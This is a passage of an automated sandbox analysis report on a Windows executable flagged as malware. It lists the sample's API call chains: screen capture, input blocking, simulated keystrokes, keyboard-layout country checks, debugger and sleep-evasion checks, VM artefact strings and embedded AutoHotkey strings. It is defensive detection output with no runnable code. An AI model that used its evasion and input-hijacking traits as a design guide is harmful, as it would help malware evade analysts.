Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400570B0 SendMessageW,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,	0_2_00000001400570B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140069800 GetTickCount,GetForegroundWindow,GetTickCount,GetWindowThreadProcessId,GetGUIThreadInfo,ClientToScreen,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_itow,	0_2_0000000140069800
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140053990 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,free,malloc,ReleaseDC,SelectObject,DeleteDC,DeleteObject,free,free,malloc,GetPixel,ReleaseDC,free,malloc,free,malloc,	0_2_0000000140053990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097CA0 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,	0_2_0000000140097CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097CA0 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,	0_2_0000000140097CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140091D8D GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	0_2_0000000140091D8D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140091D9D MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	0_2_0000000140091D9D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140091D95 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	0_2_0000000140091D95
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140091DAB MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	0_2_0000000140091DAB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097DCF ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	0_2_0000000140097DCF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097DC5 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	0_2_0000000140097DC5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140091DEF MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	0_2_0000000140091DEF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097DFA ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	0_2_0000000140097DFA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097E2C ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	0_2_0000000140097E2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140091E27 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	0_2_0000000140091E27
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140091E36 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	0_2_0000000140091E36
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097E8A ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	0_2_0000000140097E8A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140093EF0 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetClientRect,MulDiv,MulDiv,_wcstoi64,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,	0_2_0000000140093EF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097EE8 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	0_2_0000000140097EE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097F19 MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	0_2_0000000140097F19
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014008FF50 SendMessageW,MulDiv,MulDiv,free,free,free,free,free,free,free,free,free,free,free,free,COMRefPtr,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawTextW,DrawTextW,GetCharABCWidthsW,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,SelectObject,ReleaseDC,SendMessageW,SendMessageW,GetClientRect,SetWindowLongW,SendMessageW,SetWindowLongW,MoveWindow,GetWindowRect,SendMessageW,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,MapWindowPoints,	0_2_000000014008FF50

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140018F60

0_2_0000000140018F60

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Window / User API: foregroundWindowGot 826

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

API coverage: 1.4 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140018F60

0_2_0000000140018F60

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014001A970 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 000000014001AAEDh country: Russian (ru)	0_2_000000014001A970
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400229E7 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)	0_2_00000001400229E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400229E7 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)	0_2_00000001400229E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400229EF GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)	0_2_00000001400229EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400229EF GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)	0_2_00000001400229EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400229F6 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)	0_2_00000001400229F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400229F6 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)	0_2_00000001400229F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140022A1D GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)	0_2_0000000140022A1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140022A1D GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)	0_2_0000000140022A1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140022A41 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)	0_2_0000000140022A41
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140022A41 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)	0_2_0000000140022A41
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140022A65 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)	0_2_0000000140022A65
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140022A65 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)	0_2_0000000140022A65
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140015020 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140015382h country: Spanish (es)	0_2_0000000140015020

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140059470 GetLocalTime followed by cmp: cmp word ptr [rbx], cx and CTI: je 00000001400597A3h		0_2_0000000140059470
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140059470 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140059663h		0_2_0000000140059470

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400AE260 FindFirstFileW,FindClose,FindFirstFileW,FindClose,	0_2_00000001400AE260
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400AE160 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00000001400AE160
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014003C8E0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,	0_2_000000014003C8E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140066F50 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_0000000140066F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400672B0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,free,malloc,	0_2_00000001400672B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140081660 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,	0_2_0000000140081660
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140067900 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,	0_2_0000000140067900
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140081C50 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0000000140081C50

Source: Amcache.hve.0.dr	Binary or memory string: VMware
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328171326.0000000000978000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328940342.0000000003027000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:F[
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328171326.000000000093F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@n
Source: Amcache.hve.0.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

API call chain: ExitProcess graph end node

graph_0-243874

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140018080 BlockInput,free,BlockInput,

0_2_0000000140018080

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400CEB14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00000001400CEB14

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400B4300 LoadLibraryW,GetProcAddress,

0_2_00000001400B4300

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400D8678 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,

0_2_00000001400D8678

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400CEB14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00000001400CEB14
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400D37C4 SetUnhandledExceptionFilter,	0_2_00000001400D37C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400D1920 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00000001400D1920

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

0_2_0000000140041B60

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400172D0 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput,

0_2_00000001400172D0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140018AE0 mouse_event,

0_2_0000000140018AE0

Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: Program Manager
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: Shell_TrayWnd
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3327786647.00000000007FC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Progman
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: TextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt SYSTEM\CurrentControlSet\Control\Keyboard Layouts\Layout FileKbdLayerDescriptorsc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1InitialWorkingDirIndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAllClipboard...%s[%Iu of %Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersLabelTypeCountLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPFuncRemoveClipboardFormatListeneruser32AddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMeRegClassAutoHotkey2Shell_TrayWndCreateWindoweditConsolasLucida ConsoleErrorLevel <>=/\|^,:&~!()[]{}+-?."'\;`IFWHILEClass>AUTOHOTKEY SCRIPT<Could not extract script from EXE./#CommentFlag/and<>=/\|^,:<>=/\|^,:.+-&!?~::?- Continuation section too long.JoinLTrimRTrimMissing ")"Functions cannot contain functions.Missing "{"Not a valid method, class or property definition.GetSetNot a valid property getter/setter.Hotkeys/hotstrin
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400D4120 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00000001400D4120

